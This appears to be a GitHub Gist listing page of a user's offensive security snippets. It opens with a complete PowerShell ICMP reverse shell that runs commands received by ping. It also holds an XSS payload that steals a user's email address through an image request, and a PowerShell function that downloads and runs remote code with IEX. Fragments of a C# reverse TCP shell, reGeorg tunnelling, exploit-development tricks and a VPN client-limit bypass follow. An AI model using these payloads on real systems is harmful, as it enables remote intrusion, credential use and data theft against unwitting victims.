aDoN adon90

  • Spain
powershell -nop -Command "$IP = '';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
adon90 / leak.js
Created Oct 9, 2019
Perfect XSS Extraction + Information Leak
View leak.js
var req = new XMLHttpRequest();
req.onload = function () {
var patt2 = /OA_mail":\["([^"]*?)"/g;
var result = patt2.exec(req.responseText)[1];
new Image().src = (""+result);
};"GET", "/api/dataUsers/v1/WebStore/getUser", true);
adon90 /
Last active Sep 19, 2019
reGeorg with Cookie
# Save as , then -u -p 8080 -s "PHPSESSIONID: xxxxxxxxxxxxxxxxxx"
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
View VulnerableDotNetHTTPRemoting.cs
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
public class DateTimeServer : MarshalByRefObject, IDisposable
View Frida
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
View ReverseC#TCP
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
View powershell_api.txt
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
adon90 / exploiting.txt
Last active Aug 1, 2018
Exploiting Tricks
View exploiting.txt
Mona tricks:
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
View runas-cabesha-webdelivery
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
adon90 / bypassvpn.txt
Last active Jul 10, 2018
Bypass VPN Number of Clients
View bypassvpn.txt
openvpn adon901.ovpn
sshuttle -vr root@HOST
sshuttle -vr root@HOST
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80